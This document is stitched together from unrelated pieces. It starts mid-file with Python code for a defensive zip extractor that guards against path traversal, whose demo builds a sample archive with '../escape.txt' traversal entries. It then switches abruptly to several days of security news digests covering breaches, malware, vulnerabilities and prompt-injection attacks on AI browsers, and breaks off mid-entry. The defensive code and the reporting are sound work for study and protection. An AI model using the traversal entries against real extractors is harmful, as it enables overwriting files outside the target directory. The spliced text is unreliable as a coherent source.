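        return True
    except ValueError:
        return False


def safe_extract(zip_bytes: bytes, dest: str) -> dict:
    """Extract an in-memory zip into dest, rejecting members that would escape dest.

    Returns {"extracted": [names written], "rejected": [names refused]} in archive order.
    Symlink members are written as plain files holding the link text (never as links).
    """
    dest_path = Path(dest).resolve()
    dest_path.mkdir(parents=True, exist_ok=True)
    result = {"extracted": [], "rejected": []}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            name = info.filename
            # Absolute paths, drive letters and backslash separators are refused outright;
            # the archive must only ever address files relative to dest.
            if os.path.isabs(name) or name.startswith(("/", "\\")) or "\\" in name or ":" in name:
                result["rejected"].append(name)
                continue
            target = dest_path / name
            # The core Zip Slip check: normalise and confirm containment before touching disk.
            if not is_within(dest_path, target):
                result["rejected"].append(name)
                continue
            if info.is_dir():
                target.mkdir(parents=True, exist_ok=True)
            else:
                target.parent.mkdir(parents=True, exist_ok=True)
                with zf.open(info) as src, open(target, "wb") as dst:
                    dst.write(src.read())
            result["extracted"].append(name)
    return result


def build_sample_zip() -> bytes:
    """Constructed sample archive: one benign entry and two '..' traversal attempts."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("docs/readme.txt", "benign content")
        zf.writestr("../escape.txt", "should never be written")
        zf.writestr("nested/../../escape2.txt", "should never be written")
    return buf.getvalue()


def run_demo() -> dict:
    """Extract the constructed archive into a fresh temporary directory and report what happened."""
    dest = tempfile.mkdtemp(prefix="zipslip_demo_")
    result = safe_extract(build_sample_zip(), dest)
    parent = Path(dest).resolve().parent
    # Confirm nothing was written one level above the extraction directory.
    result["escaped_files_present"] = any(
        (parent / n).exists() for n in ("escape.txt", "escape2.txt")
    )
    result["benign_content"] = (Path(dest) / "docs" / "readme.txt").read_text()
    return result


if __name__ == "__main__":
    print(run_demo())
```

The containment check is done on the resolved path rather than by string-matching for `..`, so encoded or repeated segments such as `nested/../../x` are caught the same way as a bare `../x`. Because `resolve()` follows symlinks that already exist under the destination, a pre-existing link inside `dest` pointing elsewhere is also detected; extracting into a freshly created, empty directory, as `run_demo` does, removes that case entirely.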
∗∗∗ Thousands of Developer Credentials Stolen in macOS “s1ngularity” Attack ∗∗∗
---------------------------------------------
A supply chain attack called “s1ngularity” on Nx versions 20.9.0-21.8.0 stole thousands of developer credentials. The attack targeted macOS and AI tools, according to GitGuardian’s analysis.
---------------------------------------------
https://hackread.com/developer-credentials-stolen-macos-s1ngularity-attack/
∗∗∗ Cisco: Multiple products with partly high-risk vulnerabilities ∗∗∗
---------------------------------------------
Network equipment vendor Cisco released ten new security advisories on Wednesday. They cover partly high-risk vulnerabilities in several products.
---------------------------------------------
https://heise.de/-10623826
∗∗∗ Referral Beware, Your Rewards are Mine (Part 1) ∗∗∗
---------------------------------------------
Referral rewards programs are nearly ubiquitous today, from consumer tech to SaaS companies, but are rarely given much security oversight. In this blog post we’ll dig into the common technical implementations of rewards programs on web apps, common security issues with each approach, and recommendations for secure development of similar programs. In a subsequent post, we’ll explore real-world examples of these vulnerability classes in detail.
---------------------------------------------
https://rhinosecuritylabs.com/research/referral-beware-your-rewards-are-min…
=====================
= Vulnerabilities =
=====================
∗∗∗ Security updates for Thursday ∗∗∗
---------------------------------------------
Security updates have been issued by AlmaLinux (aide, firefox, kernel, and mod_http2), Debian (chromium and unbound), Fedora (mod_auth_openidc), Oracle (fence-agents and kernel), SUSE (ignition, jetty-minimal, kernel, libmozjs-128-0, matrix-synapse, postgresql13, postgresql15, postgresql16, and postgresql17), and Ubuntu (kernel).
---------------------------------------------
https://lwn.net/Articles/1035464/
∗∗∗ Libbiosig, Tenda, SAIL, PDF XChange, Foxit vulnerabilities ∗∗∗
---------------------------------------------
https://blog.talosintelligence.com/libbiosig-tenda-sail-pdf-xchange-foxit-v…
=====================
= End-of-Day report =
=====================
Timeframe: Tuesday 26-08-2025 18:00 − Wednesday 27-08-2025 18:00
Handler: Felician Fuchs
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Cyberattack on Ameos: Large hospital group suffers data theft ∗∗∗
---------------------------------------------
Data of patients and employees of the Ameos Group has fallen into the hands of cybercriminals. Those affected can now request details.
---------------------------------------------
https://www.golem.de/news/cyberangriff-auf-ameos-grosser-klinikverbund-erle…
∗∗∗ Malicious code incoming: Actively exploited Git vulnerability endangers developers ∗∗∗
---------------------------------------------
Anyone using Git should update the software urgently. Attackers are exploiting a security vulnerability to inject malicious code.
---------------------------------------------
https://www.golem.de/news/schadcode-im-anmarsch-aktiv-ausgenutzte-git-lueck…
∗∗∗ Cyber-Dome: German federal government plans stronger cyber defence ∗∗∗
---------------------------------------------
The plans for better cyber defence are still very vague. A draft law from Alexander Dobrindt is expected by the end of 2025.
---------------------------------------------
https://www.golem.de/news/cyber-dome-bundesregierung-plant-staerkere-cybera…
∗∗∗ US government takes a stake in Intel: Are crypto functions still trustworthy? ∗∗∗
---------------------------------------------
The US government's stake in Intel undermines functions such as Confidential Computing and the "sovereign cloud".
---------------------------------------------
https://www.heise.de/news/Intel-Chips-USA-inside-10622136.html
∗∗∗ Google Chrome: Update closes critical security vulnerability ∗∗∗
---------------------------------------------
The developers have closed a security vulnerability in the Google Chrome web browser that was rated a critical risk. Anyone using the browser should make sure they are running the latest version.
---------------------------------------------
https://www.heise.de/news/Google-Chrome-Update-schliesst-kritische-Sicherhe…
∗∗∗ Paypal: German banks apparently blocked payments worth billions of euros ∗∗∗
---------------------------------------------
The Süddeutsche Zeitung reports that German banks had stopped payments to Paypal. The trigger was a security problem.
---------------------------------------------
https://www.heise.de/news/Paypal-Deutsche-Banken-blockierten-offenbar-Zahlu…
∗∗∗ Governments, tech companies meet in Tokyo to share tips on fighting North Korea IT worker scheme ∗∗∗
---------------------------------------------
The U.S. State Department said it worked with the Ministries of Foreign Affairs in Japan and South Korea to organize the forum, which had more than 130 attendees from freelance work platforms, payment service providers, cryptocurrency companies, AI firms and more.
---------------------------------------------
https://therecord.media/japan-us-south-korea-forum-north-korea-it-worker-sc…
∗∗∗ Widespread Data Theft Targets Salesforce Instances via Salesloft Drift ∗∗∗
---------------------------------------------
Google Threat Intelligence Group (GTIG) is issuing an advisory to alert organizations about a widespread data theft campaign, carried out by the actor tracked as UNC6395. Beginning as early as Aug. 8, 2025 through at least Aug. 18, 2025, the actor targeted Salesforce customer instances through compromised OAuth tokens associated with the Salesloft Drift third-party application.
---------------------------------------------
https://cloud.google.com/blog/topics/threat-intelligence/data-theft-salesfo…
∗∗∗ The One Where We Just Steal The Vulnerabilities (CrushFTP CVE-2025-54309) ∗∗∗
---------------------------------------------
As we’ve all experienced in 2025, 2025 has been the year of vendors burying their heads in the sand with regard to in-the-wild exploitation, even in the face of impressively indisputable evidence, and using their status as a CNA to somehow get CVEs with suspiciously similar identifiers to the point that confusion appears almost intentional.
---------------------------------------------
https://labs.watchtowr.com/the-one-where-we-just-steal-the-vulnerabilities-…
=====================
= Vulnerabilities =
=====================
∗∗∗ Security updates for Wednesday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (node-cipher-base), Fedora (keylime-agent-rust and libtiff), Oracle (aide, kernel, mod_http2, pam, pki-deps:10.6, python-cryptography, python3, python3.12, and thunderbird), SUSE (cheat, ffmpeg, firebird, govulncheck-vulndb, postgresql17, tomcat, tomcat10, tomcat11, ucode-intel-20250812, and v2ray-core), and Ubuntu (binutils, gst-plugins-base1.0, gst-plugins-good1.0, and linux-raspi-realtime).
---------------------------------------------
https://lwn.net/Articles/1035307/
∗∗∗ Malicious versions of Nx and some supporting plugins were published ∗∗∗
---------------------------------------------
https://github.com/nrwl/nx/security/advisories/GHSA-cxm3-wv7p-598c
=====================
= End-of-Day report =
=====================
Timeframe: Monday 25-08-2025 18:00 − Tuesday 26-08-2025 18:00
Handler: Felician Fuchs
Co-Handler: Alexander Riepl
=====================
= News =
=====================
∗∗∗ New AI attack hides data-theft prompts in downscaled images ∗∗∗
---------------------------------------------
Researchers have developed a novel attack that steals user data by injecting malicious prompts in images processed by AI systems before delivering them to a large language model.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/new-ai-attack-hides-data-the…
∗∗∗ ShadowCaptcha Exploits WordPress Sites to Spread Ransomware, Info Stealers, and Crypto Miners ∗∗∗
---------------------------------------------
A new large-scale campaign has been observed exploiting over 100 compromised WordPress sites to direct site visitors to fake CAPTCHA verification pages that employ the ClickFix social engineering tactic to deliver information stealers, ransomware, and cryptocurrency miners. The large-scale cybercrime campaign, first detected in August 2025, ..
---------------------------------------------
https://thehackernews.com/2025/08/shadowcaptcha-exploits-wordpress-sites.ht…
∗∗∗ Malware-ridden apps made it into Google's Play Store, scored 19 million downloads ∗∗∗
---------------------------------------------
Everything's fine, the ad slinger assures us
Cloud security vendor Zscaler says customers of Google's Play Store have downloaded more than 19 million instances of malware-laden apps that evaded the web giant's security scans.
---------------------------------------------
https://www.theregister.com/2025/08/26/apps_android_malware/
∗∗∗ Security updates: Unauthorised access to GitHub Enterprise Server possible ∗∗∗
---------------------------------------------
A security vulnerability threatens GitHub Enterprise Server. Admins should install the patched release promptly.
---------------------------------------------
https://www.heise.de/news/Sicherheitsupdates-Unbefugte-Zugriffe-auf-GitHub-…
∗∗∗ ScreenConnect admins targeted by spear-phishing attacks ∗∗∗
---------------------------------------------
A phishing campaign is currently under way that harvests ScreenConnect credentials. The attackers want to deploy ransomware.
---------------------------------------------
https://www.heise.de/news/ScreenConnect-Admins-im-Visier-von-Spear-Phishing…
∗∗∗ HP Security Manager: Malicious code vulnerability in printer management tool ∗∗∗
---------------------------------------------
A security vulnerability in HP's Security Manager allows attackers to inject malicious code. An update is available.
---------------------------------------------
https://www.heise.de/news/HP-Security-Manager-Schadcode-Luecke-in-Druckerve…
∗∗∗ DSLRoot, Proxies, and the Threat of ‘Legal Botnets’ ∗∗∗
---------------------------------------------
The cybersecurity community on Reddit responded in disbelief this month when a self-described Air National Guard member with top secret security clearance began questioning the arrangement they'd made with a company called DSLRoot, which was paying $250 a month to plug a pair of laptops into the Redditor's high-speed Internet connection in the United States. This post ..
---------------------------------------------
https://krebsonsecurity.com/2025/08/dslroot-proxies-and-the-threat-of-legal…
∗∗∗ Cyberattack on the city of Nuremberg: Pro-Russian hackers suspected ∗∗∗
---------------------------------------------
Arrest warrants have been issued against Russian nationals.
---------------------------------------------
https://www.derstandard.at/story/3000000285014/cyberangriff-auf-die-stadt-n…
∗∗∗ The password calls forever ∗∗∗
---------------------------------------------
The use of passwords has a long tradition in IT. And everyone regularly agrees that we should really get rid of them. We still haven't managed to, even though passkeys are an interesting approach. So we are all sitting on large collections of passwords – the roughly 250 entries in ..
---------------------------------------------
https://www.cert.at/de/blog/2025/8/ewig-ruft-das-passwort
∗∗∗ Nearly 2,000 Malicious IPs Probe Microsoft Remote Desktop in Single-Day Surge ∗∗∗
---------------------------------------------
On August 21, GreyNoise observed a sharp surge in scanning against Microsoft Remote Desktop (RDP) services. The wave’s aim was clear: test for timing flaws that reveal valid usernames, laying the groundwork for credential-based intrusions.
---------------------------------------------
https://www.greynoise.io/blog/surge-malicious-ips-probe-microsoft-remote-de…
=====================
= Vulnerabilities =
=====================
∗∗∗ Security updates for Tuesday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (ffmpeg, firebird3.0, and luajit), Fedora (chromium, python3-docs, and python3.13), Oracle (aide, firefox, glibc, libxml2, and tomcat), Red Hat (aide, git, kernel, kernel-rt, libarchive, pam, python-cryptography, python3, python3.12, and webkit2gtk3), SUSE (cmake3, ffmpeg-4, kernel, kubernetes1.18, libqt4, minikube, net-tools, pam, postgresql16, proftpd, python-urllib3, python311, python312, python36, tomcat10, tomcat11, and webkit2gtk3), and ..
---------------------------------------------
https://lwn.net/Articles/1035110/
∗∗∗ Multiple (partly critical) vulnerabilities in NetScaler ADC and NetScaler Gateway ∗∗∗
---------------------------------------------
26 August 2025. Citrix has published an advisory on multiple, partly critical, vulnerabilities in the products NetScaler ADC (formerly Citrix ADC) and NetScaler Gateway (formerly Citrix Gateway). According to Citrix, attack attempts against vulnerable systems have already been observed, which tried to exploit at least the critical vulnerability CVE-2025-7775. CVE number(s): CVE-2025-7775, CVE-2025-7776, CVE-2025-8424. CVSS v4.0 base score(s): 9.2, 8.8, 8.7 ..
---------------------------------------------
https://www.cert.at/de/warnungen/2025/8/citrix-netscaler-adc-schwachstellen…
∗∗∗ Multiple Vulnerabilities in File Station 5 ∗∗∗
---------------------------------------------
https://www.qnap.com/en-us/security-advisory/QSA-25-31
=====================
= End-of-Day report =
=====================
Timeframe: Friday 22-08-2025 18:00 − Monday 25-08-2025 18:00
Handler: Felician Fuchs
Co-Handler: Alexander Riepl
=====================
= News =
=====================
∗∗∗ New Android malware poses as antivirus from Russian intelligence agency ∗∗∗
---------------------------------------------
A new Android malware posing as antivirus software created by Russia's Federal Security Service (FSB) is being used to target executives of Russian businesses.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/new-android-malware-poses-as…
∗∗∗ Social engineering: Crypto investor loses Bitcoin worth 90 million USD ∗∗∗
---------------------------------------------
Scammers have relieved a crypto investor of a fortune. The victim is now 783 Bitcoin poorer. He will probably never see the money again.
---------------------------------------------
https://www.golem.de/news/social-engineering-krypto-anleger-verliert-bitcoi…
∗∗∗ Criminal background checker APCS faces data breach ∗∗∗
---------------------------------------------
The attack first affected an upstream provider of bespoke software. A leading UK provider of criminal record checks for employers is handling a data breach stemming from a third-party development company.
---------------------------------------------
https://www.theregister.com/2025/08/22/apcs_breach/
∗∗∗ Botnet campaign "Gayfemboy" also active in Germany ∗∗∗
---------------------------------------------
IT researchers at Fortinet are observing an IoT botnet that is based on "Mirai" and is called "Gayfemboy". It hides itself well.
---------------------------------------------
https://www.heise.de/news/Mirai-basierte-Botnet-Kampagne-Gayfemboy-auch-in-…
∗∗∗ Criminals lure victims with alleged crypto balances ∗∗∗
---------------------------------------------
Lukas can hardly believe his eyes. In his inbox is an e-mail claiming that a large amount is sitting in his crypto wallet. To regain access, he supposedly only needs to follow a few simple steps. But beware: the e-mail comes from criminals who want to get him to make large transfers!
---------------------------------------------
https://www.watchlist-internet.at/news/kriminelle-locken-mit-angeblichen-kr…
∗∗∗ Popular travel eSIMs secretly route data via China ∗∗∗
---------------------------------------------
A recent investigation reveals serious security and privacy deficiencies at many providers.
---------------------------------------------
https://www.derstandard.at/story/3000000284843/beliebte-esims-fuer-reisen-l…
∗∗∗ Phishing in the Classroom: 115,000 Emails Exploit Google Classroom to Target 13,500 Organizations ∗∗∗
---------------------------------------------
Check Point researchers have uncovered a large-scale active phishing campaign abusing Google Classroom, a platform trusted by millions of students and educators worldwide. Over the course of just one week, attackers launched ..
---------------------------------------------
https://blog.checkpoint.com/email-security/phishing-in-the-classroom-115000…
∗∗∗ Chrome extension FreeVPN.One recorded screenshots of page visits ∗∗∗
---------------------------------------------
Anyone who believed until now that Microsoft's Recall leads the pack when it comes to surveillance has to think again. Security researchers came across the FreeVPN.One extension for the Google Chrome browser. It took screenshots of all ..
---------------------------------------------
https://www.borncity.com/blog/2025/08/24/chrome-erweiterung-freevpn-one-zei…
∗∗∗ Cybercriminals Exploit Cheap VPS to Launch SaaS Hijacking Attacks ∗∗∗
---------------------------------------------
Darktrace researchers have discovered a new wave of attacks where cybercriminals use cheap Virtual Private Servers (VPS) ..
---------------------------------------------
https://hackread.com/cybercriminals-exploit-cheap-vps-saas-hijack-attacks/
∗∗∗ Phishing Campaign Targeting Companies via UpCrypter ∗∗∗
---------------------------------------------
FortiGuard Labs recently identified a phishing campaign leveraging carefully crafted emails to deliver malicious URLs linked to convincing phishing pages. These pages are designed to entice recipients into downloading JavaScript files that act as droppers for UpCrypter, malware that ultimately deploys various remote access tools (RATs).
---------------------------------------------
https://www.fortinet.com/blog/threat-research/phishing-campaign-targeting-c…
∗∗∗ Web hosting software cPanel: updates close security vulnerability ∗∗∗
---------------------------------------------
With new versions, the web hosting management software cPanel and WHM closes at least one security vulnerability that is considered high-risk.
---------------------------------------------
https://heise.de/-10599503
=====================
= End-of-Day report =
=====================
Timeframe: Thursday 21-08-2025 18:00 − Friday 22-08-2025 18:00
Handler: Alexander Riepl
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Dev gets 4 years for creating kill switch on ex-employer's systems ∗∗∗
---------------------------------------------
A software developer has been sentenced to four years in prison for sabotaging his ex-employer's Windows network with custom malware and a kill switch that locked out employees when his account was disabled.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/dev-gets-4-years-for-creatin…
∗∗∗ Fake Mac fixes trick users into installing new Shamos infostealer ∗∗∗
---------------------------------------------
A new infostealer malware called Shamos is targeting Mac devices in ClickFix attacks that impersonate troubleshooting guides and fixes.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/fake-mac-fixes-trick-users-i…
∗∗∗ Despite rolling code: unofficial Flipper Zero firmware allegedly cracks cars ∗∗∗
---------------------------------------------
A Russian actor is selling custom firmware for the Flipper Zero. Even the newest cars from common brands can allegedly be unlocked with it.
---------------------------------------------
https://www.golem.de/news/trotz-rolling-code-inoffizielle-flipper-zero-firm…
∗∗∗ Think before you Click(Fix): Analyzing the ClickFix social engineering technique ∗∗∗
---------------------------------------------
The ClickFix social engineering technique has been growing in popularity, with campaigns targeting thousands of enterprise and end-user devices daily. This technique exploits users’ tendency to resolve technical issues by tricking them into running malicious commands. These commands, in turn, deliver payloads that ultimately lead to information theft and ..
---------------------------------------------
https://www.microsoft.com/en-us/security/blog/2025/08/21/think-before-you-c…
∗∗∗ Coinbase Reverses Remote-First Policy After North Korean Infiltration Attempts ∗∗∗
---------------------------------------------
Remote work policies designed to attract top talent are becoming security vulnerabilities as state-sponsored hackers seek employment at cryptocurrency firms. Coinbase has implemented mandatory in-person orientation and US citizenship requirements for sensitive roles after detecting North Korean IT workers attempting to infiltrate the company ..
---------------------------------------------
https://slashdot.org/story/25/08/22/1515238/coinbase-reverses-remote-first-…
∗∗∗ Linux Malware Delivered via Malicious RAR Filenames Evades Antivirus Detection ∗∗∗
---------------------------------------------
Cybersecurity researchers have shed light on a novel attack chain that employs phishing emails to deliver an open-source backdoor called VShell. The "Linux-specific malware infection chain that starts with a spam email with a malicious ..
---------------------------------------------
https://thehackernews.com/2025/08/linux-malware-delivered-via-malicious.html
∗∗∗ Interpol bags 1,209 suspects, $97M in cybercrime operation focused on Africa ∗∗∗
---------------------------------------------
Crypto mines, BEC scams, fake passports, and a $300M fraud empire allegedly brought down during Serengeti 2.0. Interpol's latest clampdown on cybercrime resulted in 1,209 arrests across the African continent, from ransomware crooks to business ..
---------------------------------------------
https://www.theregister.com/2025/08/22/interpol_serengeti_20/
∗∗∗ AI assistant: Microsoft's Copilot falsified access logs for months ∗∗∗
---------------------------------------------
When asked for document summaries, for instance, the virtual Copilot sometimes concealed its accesses. Microsoft kept the problem quiet.
---------------------------------------------
https://www.heise.de/news/KI-Assistent-Microsofts-Copilot-verfaelschte-mona…
∗∗∗ Electronics manufacturer Data I/O reports ransomware attack to SEC ∗∗∗
---------------------------------------------
The tech manufacturer Data I/O reported a ransomware attack to federal regulators, writing that the incident has taken down critical operational systems.
---------------------------------------------
https://therecord.media/electronics-manufacturer-dataio-ransomware
∗∗∗ AI Browsers Can Be Tricked Into Paying Fake Stores in PromptFix Attack ∗∗∗
---------------------------------------------
The PromptFix attack tricks AI browsers with fake CAPTCHAs, leading them to phishing sites and fake stores ..
---------------------------------------------
https://hackread.com/ai-browsers-trick-paying-fake-stores-promptfix-attack/
∗∗∗ AUR Chaos malware: an analysis ∗∗∗
---------------------------------------------
Recently, an incident involving malware in the AUR made the headlines. I read a lot of things around this topic, both right and wrong, and sometimes misleading. As I was involved in the incident handling, I chose to write this blog post, not only for transparency but also for laying down what I learned both during and ..
---------------------------------------------
https://www.mh4ckt3mh4ckt1c4s.xyz/blog/aur-chaos-malware-analysis/
=====================
= Vulnerabilities =
=====================
∗∗∗ Security updates for Friday ∗∗∗
---------------------------------------------
Security updates have been issued by AlmaLinux (tomcat), Debian (squid), Fedora (matrix-synapse, rust-slab, socat, and webkitgtk), SUSE (firefox-esr, gdk-pixbuf, gdk-pixbuf-devel, govulncheck-vulndb, rust-keylime, and wicked2nm), and Ubuntu (linux-nvidia, linux-oracle, linux-oracle-6.8, php7.0, php7.2, php7.4, python3.13, python3.12, python3.11, python3.10, python3.9, python3.8, python3.7, python3.6, python3.5, python3.4, and ruby-webrick).
---------------------------------------------
https://lwn.net/Articles/1034755/
=====================
= End-of-Day report =
=====================
Timeframe: Wednesday 20-08-2025 18:00 − Thursday 21-08-2025 18:00
Handler: Alexander Riepl
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ iPhone, iPad and Mac: actively exploited security vulnerability endangers Apple users ∗∗∗
---------------------------------------------
Emergency updates close an actively exploited security vulnerability in iOS, iPadOS and macOS. Users should patch urgently.
---------------------------------------------
https://www.golem.de/news/iphone-ipad-und-mac-aktiv-ausgenutzte-sicherheits…
∗∗∗ Airtell Router Scans, and Mislabeled usernames ∗∗∗
---------------------------------------------
Looking at new usernames collected by our Cowrie honeypots, you will first of all notice a number of HTTP headers. It is very common for attackers to scan for web servers on ports that are covered by our Telnet honeypots. The result ..
---------------------------------------------
https://isc.sans.edu/forums/diary/Airtell+Router+Scans+and+Mislabeled+usern…
∗∗∗ New tricks with QR codes ∗∗∗
---------------------------------------------
QR codes are popular vehicles for criminals to smuggle hyperlinks past security systems to the victim. Their ingenuity is considerable.
---------------------------------------------
https://www.heise.de/news/Neue-Tricks-mit-QR-Codes-10559942.html
∗∗∗ Docker Desktop: critical security vulnerability allows host access ∗∗∗
---------------------------------------------
In Docker Desktop, malicious containers can reach through to the host system; protective measures do not take effect. An update helps.
---------------------------------------------
https://www.heise.de/news/Docker-Desktop-Kritische-Sicherheitsluecke-erlaub…
∗∗∗ Modern Solution: convicted IT expert files constitutional complaint ∗∗∗
---------------------------------------------
The verdict against a security researcher convicted under the "hacker paragraph" is final. The convicted man is now taking his case to Karlsruhe.
---------------------------------------------
https://www.heise.de/news/Modern-Solution-Verurteilter-IT-Experte-reicht-Ve…
∗∗∗ SIM-Swapper, Scattered Spider Hacker Gets 10 Years ∗∗∗
---------------------------------------------
A 21-year-old Florida man at the center of a prolific cybercrime group known as "Scattered Spider" was sentenced to 10 years in federal prison today, and ordered to pay roughly $13 million in restitution to victims. Noah Michael Urban of Palm Coast, Fla. pleaded guilty in April 2025 to charges of wire fraud and conspiracy. Florida prosecutors alleged Urban ..
---------------------------------------------
https://krebsonsecurity.com/2025/08/sim-swapper-scattered-spider-hacker-get…
∗∗∗ Warning, phishing trap: FinanzOnline is not requesting information on crypto holdings! ∗∗∗
---------------------------------------------
Citing a new "tax regulation for cryptocurrencies", "FinanzOnline" is currently supposedly requesting comprehensive information about crypto assets via e-mail. Of course, it is not the real finance portal making contact here. Rather, criminals are using this scheme to try to obtain the access credentials for their victims' crypto wallets.
---------------------------------------------
https://www.watchlist-internet.at/news/phishing-falle-finanzonline-krypto/
∗∗∗ Your Connection, Their Cash: Threat Actors Misuse SDKs to Sell Your Bandwidth ∗∗∗
---------------------------------------------
A campaign leverages CVE-2024-36401 to stealthily monetize victims' bandwidth, where legitimate software development kits (SDKs) are deployed for passive income.
---------------------------------------------
https://unit42.paloaltonetworks.com/attackers-sell-your-bandwidth-using-sdk…
=====================
= End-of-Day report =
=====================
Timeframe: Tuesday 19-08-2025 18:00 − Wednesday 20-08-2025 18:00
Handler: Alexander Riepl
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ PyPI now blocks domain resurrection attacks used for hijacking accounts ∗∗∗
---------------------------------------------
The Python Package Index (PyPI) has introduced new protections against domain resurrection attacks that enable hijacking accounts through password resets.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/pypi-now-blocks-domain-resur…
∗∗∗ Hackers steal Microsoft logins using legitimate ADFS redirects ∗∗∗
---------------------------------------------
Hackers are using a novel technique that combines legitimate office.com links with Active Directory Federation Services (ADFS) to redirect users to a phishing page that steals Microsoft 365 logins.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/hackers-steal-microsoft-logi…
∗∗∗ Experts Find AI Browsers Can Be Tricked by PromptFix Exploit to Run Malicious Hidden Prompts ∗∗∗
---------------------------------------------
Cybersecurity researchers have demonstrated a new prompt injection technique called PromptFix that tricks a generative artificial intelligence (GenAI) model into carrying out intended actions by embedding the malicious instruction inside a ..
---------------------------------------------
https://thehackernews.com/2025/08/experts-find-ai-browsers-can-be-tricked.h…
∗∗∗ Like burglars closing a door, Apache ActiveMQ attackers patch critical vuln after breaking in ∗∗∗
---------------------------------------------
Intruders hoped no one would notice their presence. Criminals exploiting a critical vulnerability in open source Apache ActiveMQ middleware are fixing the flaw that allowed them access, after establishing persistence on Linux servers.
---------------------------------------------
https://www.theregister.com/2025/08/19/apache_activemq_patch_malware/
∗∗∗ Commvault: high-risk vulnerability allows injection of malicious code ∗∗∗
---------------------------------------------
In the backup software Commvault, attackers can abuse security vulnerabilities to, for example, inject malicious code. Updates are available.
---------------------------------------------
https://www.heise.de/news/Commvault-Hochriskante-Luecke-ermoeglicht-Einschl…
∗∗∗ Infoniqa IT incident: cyber gang claims to have copied extensive data ∗∗∗
---------------------------------------------
Last week an IT incident at HR software provider Infoniqa became known. Now a cyber gang claims to have copied data.
---------------------------------------------
https://www.heise.de/news/Infoniqa-IT-Vorfall-Cyberbande-will-umfangreich-D…
∗∗∗ Stolen legal notices and working links: beware of particularly sophisticated fake shops! ∗∗∗
---------------------------------------------
The more effort criminals put into imitating an online shop, the harder it is to recognise the fraud. In a current case they not only use real legal-notice (Impressum) data but also link from their fake shops to the company's real website and its real social media profiles. Here is how the trap can nevertheless be spotted relatively easily.
---------------------------------------------
https://www.watchlist-internet.at/news/besonders-ausgekluegelte-fake-shops/
∗∗∗ Major Belgian telecom firm says cyberattack compromised data on 850,000 accounts ∗∗∗
---------------------------------------------
The company said no critical data was accessed, but the hacker "gained access to one of our IT systems that contains the following data: name, first name, telephone number, SIM card number, PUK code, tariff plan.”
---------------------------------------------
https://therecord.media/belgian-telecom-says-cyberattack-compromised-data-o…
∗∗∗ Feds charge alleged administrator of ‘sophisticated’ Rapper Bot botnet ∗∗∗
---------------------------------------------
A 22-year-old Oregon man has been charged with running a powerful botnet-for-hire service used to launch hundreds of thousands of cyberattacks worldwide, the U.S. Justice Department said.
---------------------------------------------
https://therecord.media/feds-charge-botnet-admin
∗∗∗ Russian state-sponsored espionage group Static Tundra compromises unpatched end-of-life network devices ∗∗∗
---------------------------------------------
A Russian state-sponsored group, Static Tundra, is exploiting an old Cisco IOS vulnerability to compromise unpatched network devices worldwide, targeting key sectors for intelligence gathering.
---------------------------------------------
https://blog.talosintelligence.com/static-tundra/
∗∗∗ Warlock: From SharePoint Vulnerability Exploit to Enterprise Ransomware ∗∗∗
---------------------------------------------
Warlock ransomware exploits unpatched Microsoft SharePoint vulnerabilities to gain access, escalate privileges, steal credentials, move laterally, and deploy ransomware with data exfiltration across enterprise environments.
---------------------------------------------
https://www.trendmicro.com/en_us/research/25/h/warlock-ransomware.html
∗∗∗ A Cereal Offender: Analyzing the CORNFLAKE.V3 Backdoor ∗∗∗
---------------------------------------------
Straight from Mandiant Threat Defense, the "Frontline Bulletin" series brings you the latest on the most intriguing compromises we are seeing in the wild right now, equipping our community to understand and respond to the most compelling threats we observe. This edition dissects an infection involving two threat groups, UNC5518 and UNC5774, leading to the deployment of ..
---------------------------------------------
https://cloud.google.com/blog/topics/threat-intelligence/analyzing-cornflak…
∗∗∗ Guess Who Would Be Stupid Enough To Rob The Same Vault Twice? Pre-Auth RCE Chains in Commvault ∗∗∗
---------------------------------------------
We’re back, and we’ve finished telling everyone that our name was on the back of Phrack!!!!1111 Whatever, nerds. Today, we're back to scheduled content. Like our friendly neighbourhood ransomware gangs and APT groups, we've continued to spend ..
---------------------------------------------
https://labs.watchtowr.com/guess-who-would-be-stupid-enough-to-rob-the-same…
∗∗∗ Researcher Exposes Zero-Day Clickjacking Vulnerabilities in Major Password Managers ∗∗∗
---------------------------------------------
At DEF CON 33, Czech Republic-based security researcher Marek Tóth unveiled a series of unpatched zero-day clickjacking security vulnerabilities impacting the browser-based plugins for a wide range of password managers including: 1Password, Bitwarden, Dashlane, Enpass, iCloud Passwords, Keeper, LastPass, LogMeOnce, NordPass, ProtonPass, and ..
---------------------------------------------
https://socket.dev/blog/password-manager-clickjacking
∗∗∗ Marshal madness: A brief history of Ruby deserialization exploits ∗∗∗
---------------------------------------------
This post traces the decade-long evolution of Ruby Marshal deserialization exploits, demonstrating how security researchers have repeatedly bypassed patches and why fundamental changes to the Ruby ecosystem are needed rather than continued patch-and-hope approaches.
---------------------------------------------
https://blog.trailofbits.com/2025/08/20/marshal-madness-a-brief-history-of-…
=====================
= Vulnerabilities =
=====================
∗∗∗ Security updates for Wednesday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (webkit2gtk), Fedora (firefox and libarchive), Red Hat (python3.11-setuptools and python3.12-setuptools), Slackware (mozilla), SUSE (apache2-mod_security2, cairo-devel, cflow, docker, glibc, go1.25, govulncheck-vulndb, gstreamer-0_10-plugins-base, jq, kernel, libarchive, libssh, libxslt, openbao, python-urllib3, systemd, and xz), and Ubuntu (apache2, libssh, libxml2, linux, linux-aws, linux-aws-5.15, linux-gcp, linux-gcp-5.15, linux-gkeop, ..
---------------------------------------------
https://lwn.net/Articles/1034546/
=====================
= End-of-Day report =
=====================
Timeframe: Monday 18-08-2025 18:00 − Tuesday 19-08-2025 18:00
Handler: Alexander Riepl
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ In multiple web portals: hardcoded credentials found in droves at Intel ∗∗∗
---------------------------------------------
